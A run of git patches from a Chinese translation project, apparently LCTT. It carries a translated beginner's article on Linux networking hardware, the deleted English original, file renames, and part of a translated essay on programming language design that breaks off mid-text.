+一台路由器能连接一切,一个小巧特殊的小盒子只专注于路由,一个大点的盒子将会提供路由,防火墙,域名服务,以及VPN网关功能,一台重新设计的台式电脑或者笔记本,一个树莓派计算机或者一个小模块,体积臃肿矮小的像PC这样的单板计算机,除了苛刻的用途以外,普通的商品硬件都能良好的工作运行。高端的路由器使用特殊设计的硬件每秒能够传输最大量的数据包。 它们有多路数据总线,多个中央处理器和极快的存储。 +可以通过查阅Juniper和思科的路由器来感受一下高端路由器书什么样子的,而且能看看里面是什么样的构造。 +一个接入你的局域网的无线接入点要么作为一个以太网网桥要么作为一个路由器。一个桥接器扩展了这个网络,所以在这个桥接器上的任意一端口上的主机都连接在同一个网络中。 +一台路由器连接的是两个不同的网络。 +### Network Topology:网络拓扑 + + +有多种设置你的局域网的方式,你可以把所有主机接入到一个单独的平面网络,如果你的交换机支持的话,你也可以把它们分配到不同的子网中。 +平面网络是最简单的网络,只需把每一台设备接入到同一个交换机上即可,如果一台交换上的端口不够使用,你可以将更多的交换机连接在一起。 +有些交换机有特殊的上行端口,有些是没有这种特殊限制的上行端口,你可以连接其中的任意端口,你可能需要使用交叉类型的以太网线,所以你要查阅你的交换机的说明文档来设置。平面网络是最容易管理的,你不需要路由器也不需要计算子网,但它也有一些缺点。他们的伸缩性不好,所以当网络规模变得越来越大的时候就会被广播网络所阻塞。 +将你的局域网进行分段将会提升安全保障, 把局域网分成可管理的不同网段将有助于管理更大的网络。 + 图2展示了一个分成两个子网的局域网络:内部的有线和无线主机,和非军事区域(从来不知道所所有的工作上的男性术语都是在计算机上键入的?)因为他被阻挡了所有的内部网络的访问。 + + +### [fig-2.png][5] + +![LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_4.png?itok=LpXq7bLf "LAN") + +图2:一个分成两个子网的简单局域网。 +即使像图2那样的小型网络也可以有不同的配置方法。你可以将防火墙和路由器放置在一台单独的设备上。 +你可以为你的非军事区域设置一个专用的网络连接,把它完全从你的内部网络隔离,这将引导我们进入下一个主题:一切基于软件。 + + +### Think Software软件思维 + + +你可能已经注意到在这个简短的系列中我们所讨论的硬件,只有网络接口,交换机,和线缆是特殊用途的硬件。 +其它的都是通用的商用硬件,而且都是软件来定义它的用途。 +网关,虚拟专用网关,以太网桥,网页,邮箱以及文件等等。 +服务器,负载均衡,代理,大量的服务,各种各样的认证,中继,故障转移...你可以在运行着Linux系统的标准硬件上运行你的整个网络。 +你甚至可以使用Linux交换应用和VDE2协议来模拟以太网交换机,像DD-WRT,openWRT 和Rashpberry Pi distros,这些小型的硬件都是有专业的分类的,要记住BSDS和它们的特殊衍生用途如防火墙,路由器,和网络附件存储。 +你知道有些人坚持认为硬件防火墙和软件防火墙有区别?其实是没有区别的,就像说有一台硬件计算机和一台软件计算机。 +### Port Trunking and Ethernet Bonding +端口聚合和以太网绑定 +聚合和绑定,也称链路聚合,是把两条以太网通道绑定在一起成为一条通道。一些交换机支持端口聚合,就是把两个交换机端口绑定在一起成为一个是他们原来带宽之和的一条新的连接。对于一台承载很多业务的服务器来说这是一个增加通道带宽的有效的方式。 +你也可以在以太网口进行同样的配置,而且绑定汇聚的驱动是内置在Linux内核中的,所以不需要任何其他的专门的硬件。 + + +### Bending Mobile Broadband to your Will随心所欲选择你的移动带宽 + +我期望移动带宽能够迅速增长来替代DSL和有线网络。我居住在一个有250,000人口的靠近一个城市的地方,但是在城市以外,要想接入互联网就要靠运气了,即使那里有很大的用户上网需求。我居住的小角落离城镇有20分钟的距离,但对于网络服务供应商来说他们几乎不会考虑到为这个地方提供网络。 我唯一的选择就是移动带宽; 这里没有拨号网络,卫星网络(即使它很糟糕)或者是DSL,电缆,光纤,但却没有阻止网络供应商把那些在我这个区域从没看到过的无限制通信个其他高速网络服务的传单塞进我的邮箱。 +我试用了AT&T,Version,和T-Mobile。Version的信号覆盖范围最广,但是Version和AT&T是最昂贵的。 +我居住的地方在T-Mobile信号覆盖的边缘,但迄今为止他们给了最大的优惠,为了能够能够有效的使用,我必须购买一个WeBoostDe信号放大器和 +一台中兴的移动热点设备。当然你也可以使用一部手机作为热点,但是专用的热点设备有着最强的信号。如果你正在考虑购买一台信号放大器,最好的选择就是WeBoost因为他们的服务支持最棒,而且他们会尽最大努力去帮助你。在一个小小的APP的协助下去设置将会精准的增强 你的网络信号,他们有一个功能较少的免费的版本,但你将一点都不会后悔去花两美元使用专业版。 +那个小巧的中兴热点设备能够支持15台主机而且还有拥有基本的防火墙功能。 但你如果你使用像 Linksys WRT54GL这样的设备,使用Tomato,openWRT,或者DD-WRT来替代普通的固件,这样你就能完全控制你的防护墙规则,路由配置,以及任何其他你想要设置的服务。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-think-software + +作者:[CARLA SCHRODER][a] +译者:[FelixYFZ](https://github.com/FelixYFZ) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/creative-commons-zero +[4]:https://www.linux.com/files/images/fig-1png-7 +[5]:https://www.linux.com/files/images/fig-2png-4 +[6]:https://www.linux.com/files/images/soderskar-islandjpg +[7]:https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-lan-hardware +[8]:http://www.bluelinepc.com/signalcheck/ From 1a976208331c92480f576c4f7df65fa67135973a Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:28:56 +0800 Subject: [PATCH 0236/1627] =?UTF-8?q?=E8=A1=A5=E5=AE=8C=20PR?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @FelixYFZ 你的 PR 有问题,需要删除原文,并且不能修改文件名,要保留文件名前的日期和扩展名。我帮你修复了。 --- ...g Hardware for Beginners Think Software.md | 79 ------------------- ... Hardware for Beginners Think Software.md} | 0 2 files changed, 79 deletions(-) delete mode 100644 sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md rename translated/tech/{Linux Networking Hardware for Beginners: Think Software => 20171012 Linux Networking Hardware for Beginners Think Software.md} (100%) diff --git a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md b/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md deleted file mode 100644 index 661f5bc2df..0000000000 --- a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md +++ /dev/null @@ -1,79 +0,0 @@ -Translating by FelixYFZ - -Linux Networking Hardware for Beginners: Think Software -============================================================ - -![island network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/soderskar-island.jpg?itok=wiMaF66b "island network") -Without routers and bridges, we would be lonely little islands; learn more in this networking tutorial.[Creative Commons Zero][3]Pixabay - -Last week, we learned about [LAN (local area network) hardware][7]. This week, we'll learn about connecting networks to each other, and some cool hacks for mobile broadband. - -### Routers - -Network routers are everything in computer networking, because routers connect networks. Without routers we would be lonely little islands. Figure 1 shows a simple wired LAN (local area network) with a wireless access point, all connected to the Internet. Computers on the LAN connect to an Ethernet switch, which connects to a combination firewall/router, which connects to the big bad Internet through whatever interface your Internet service provider (ISP) provides, such as cable box, DSL modem, satellite uplink...like everything in computing, it's likely to be a box with blinky lights. When your packets leave your LAN and venture forth into the great wide Internet, they travel from router to router until they reach their destination. - -### [fig-1.png][4] - -![simple LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_7.png?itok=lsazmf3- "simple LAN") -Figure 1: A simple wired LAN with a wireless access point.[Used with permission][1] - -A router can look like pretty much anything: a nice little specialized box that does only routing and nothing else, a bigger box that provides routing, firewall, name services, and VPN gateway, a re-purposed PC or laptop, a Raspberry Pi or Arduino, stout little single-board computers like PC Engines...for all but the most demanding uses, ordinary commodity hardware works fine. The highest-end routers use specialized hardware that is designed to move the maximum number of packets per second. They have multiple fat data buses, multiple CPUs, and super-fast memory. (Look up Juniper and Cisco routers to see what high-end routers look like, and what's inside.) - -A wireless access point connects to your LAN either as an Ethernet bridge or a router. A bridge extends the network, so hosts on both sides of the bridge are on the same network. A router connects two different networks. - -### Network Topology - -There are multitudes of ways to set up your LAN. You can put all hosts on a single flat network. You can divide it up into different subnets. You can divide it into virtual LANs, if your switch supports this. - -A flat network is the simplest; just plug everyone into the same switch. If one switch isn't enough you can connect switches to each other. Some switches have special uplink ports, some don't care which ports you connect, and you may need to use a crossover Ethernet cable, so check your switch documentation. - -Flat networks are the easiest to administer. You don't need routers and don't have to calculate subnets, but there are some downsides. They don't scale, so when they get too large they get bogged down by broadcast traffic. Segmenting your LAN provides a bit of security, and makes it easier to manage larger networks by dividing it into manageable chunks. Figure 2 shows a simplified LAN divided into two subnets: internal wired and wireless hosts, and one for servers that host public services. The subnet that contains the public-facing servers is called a DMZ, demilitarized zone (ever notice all the macho terminology for jobs that are mostly typing on a computer?) because it is blocked from all internal access. - -### [fig-2.png][5] - -![LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_4.png?itok=LpXq7bLf "LAN") -Figure 2: A simplified LAN divided into two subnets.[Used with permission][2] - -Even in a network as small as Figure 2 there are several ways to set it up. You can put your firewall and router on a single device. You could have a dedicated Internet link for the DMZ, divorcing it completely from your internal network. Which brings us to our next topic: it's all software. - -### Think Software - -You may have noticed that of the hardware we have discussed in this little series, only network interfaces, switches, and cabling are special-purpose hardware. Everything else is general-purpose commodity hardware, and it's the software that defines its purpose. Linux is a true networking operating system, and it supports a multitude of network operations: VLANs, firewall, router, Internet gateway, VPN gateway, Ethernet bridge, Web/mail/file/etc. servers, load-balancer, proxy, quality of service, multiple authenticators, trunking, failover...you can run your entire network on commodity hardware with Linux. You can even use Linux to simulate an Ethernet switch with LISA (LInux Switching Appliance) and vde2. - -There are specialized distributions for small hardware like DD-WRT, OpenWRT, and the Raspberry Pi distros, and don't forget the BSDs and their specialized offshoots like the pfSense firewall/router, and the FreeNAS network-attached storage server. - -You know how some people insist there is a difference between a hardware firewall and a software firewall? There isn't. That's like saying there is a hardware computer and a software computer. - -### Port Trunking and Ethernet Bonding - -Trunking and bonding, also called link aggregation, is combining two Ethernet channels into one. Some Ethernet switches support port trunking, which is combining two switch ports to combine their bandwidth into a single link. This is a nice way to make a bigger pipe to a busy server. - -You can do the same thing with Ethernet interfaces, and the bonding driver is built-in to the Linux kernel, so you don't need any special hardware. - -### Bending Mobile Broadband to your Will - -I expect that mobile broadband is going to grow in the place of DSL and cable Internet. I live near a city of 250,000 population, but outside the city limits good luck getting Internet, even though there is a large population to serve. My little corner of the world is 20 minutes from town, but it might as well be the moon as far as Internet service providers are concerned. My only option is mobile broadband; there is no dialup, satellite Internet is sold out (and it sucks), and haha lol DSL, cable, or fiber. That doesn't stop ISPs from stuffing my mailbox with flyers for Xfinity and other high-speed services my area will never see. - -I tried AT&T, Verizon, and T-Mobile. Verizon has the strongest coverage, but Verizon and AT&T are expensive. I'm at the edge of T-Mobile coverage, but they give the best deal by far. To make it work, I had to buy a weBoost signal booster and ZTE mobile hotspot. Yes, you can use a smartphone as a hotspot, but the little dedicated hotspots have stronger radios. If you're thinking you might want a signal booster, I have nothing but praise for weBoost because their customer support is superb, and they will do their best to help you. Set it up with the help of a great little app that accurately measures signal strength, [SignalCheck Pro][8]. They have a free version with fewer features; spend the two bucks to get the pro version, you won't be sorry. - -The little ZTE hotspots serve up to 15 hosts and have rudimentary firewalls. But we can do better: get something like the Linksys WRT54GL, replace the stock firmware with Tomato, OpenWRT, or DD-WRT, and then you have complete control of your firewall rules, routing, and any other services you want to set up. - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-think-software - -作者:[CARLA SCHRODER][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/cschroder -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/creative-commons-zero -[4]:https://www.linux.com/files/images/fig-1png-7 -[5]:https://www.linux.com/files/images/fig-2png-4 -[6]:https://www.linux.com/files/images/soderskar-islandjpg -[7]:https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-lan-hardware -[8]:http://www.bluelinepc.com/signalcheck/ diff --git a/translated/tech/Linux Networking Hardware for Beginners: Think Software b/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md similarity index 100% rename from translated/tech/Linux Networking Hardware for Beginners: Think Software rename to translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md From 79f337b4547d29d3a20f49e373be479fe3bd3625 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:29:41 +0800 Subject: [PATCH 0237/1627] =?UTF-8?q?=E8=A1=A5=E5=AE=8C=20PR?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @filefi 不要丢掉扩展名。 --- ...20171202 Scrot Linux command-line screen grabs made simple.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename sources/tech/{20171202 Scrot Linux command-line screen grabs made simple => 20171202 Scrot Linux command-line screen grabs made simple.md} (100%) diff --git a/sources/tech/20171202 Scrot Linux command-line screen grabs made simple b/sources/tech/20171202 Scrot Linux command-line screen grabs made simple.md similarity index 100% rename from sources/tech/20171202 Scrot Linux command-line screen grabs made simple rename to sources/tech/20171202 Scrot Linux command-line screen grabs made simple.md From 557c2e97ab8c3c218fb6fb21544eb71bbe78879c Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:31:40 +0800 Subject: [PATCH 0238/1627] =?UTF-8?q?=E5=B7=B2=E5=8F=91=E5=B8=83?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @geekpi --- .../20171201 Linux Journal Ceases Publication.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171201 Linux Journal Ceases Publication.md (100%) diff --git a/translated/tech/20171201 Linux Journal Ceases Publication.md b/published/20171201 Linux Journal Ceases Publication.md similarity index 100% rename from translated/tech/20171201 Linux Journal Ceases Publication.md rename to published/20171201 Linux Journal Ceases Publication.md From 81aee45a065eef827369d23fea71e6f37469c17b Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 19:09:44 +0800 Subject: [PATCH 0239/1627] Language engineering for great justice. Translated by Valoniakim --- .../Language engineering for great justice. | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 translated/tech/Language engineering for great justice. diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice. new file mode 100644 index 0000000000..7f982e0d19 --- /dev/null +++ b/translated/tech/Language engineering for great justice. @@ -0,0 +1,24 @@ +# 最合理的语言工程模式 +## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 +## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 +## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 +## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 +## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? +## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 +## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 +## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 +## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 +## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 +## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! +## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 +## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 +## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 +## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 +## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 +## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 +## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 +## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 +## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 +## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 + + From 85931826bbca0c9ec3188689d35449eaa478516f Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 20:11:40 +0800 Subject: [PATCH 0240/1627] Update Language engineering for great justice. Translated by Valoniakim --- .../Language engineering for great justice. | 83 +++++++++++++------ 1 file changed, 59 insertions(+), 24 deletions(-) diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice. index 7f982e0d19..301337b11c 100644 --- a/translated/tech/Language engineering for great justice. +++ b/translated/tech/Language engineering for great justice. @@ -1,24 +1,59 @@ -# 最合理的语言工程模式 -## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 -## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 -## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 -## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 -## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? -## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 -## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 -## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 -## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 -## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 -## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! -## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 -## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 -## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 -## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 -## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 -## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 -## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 -## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 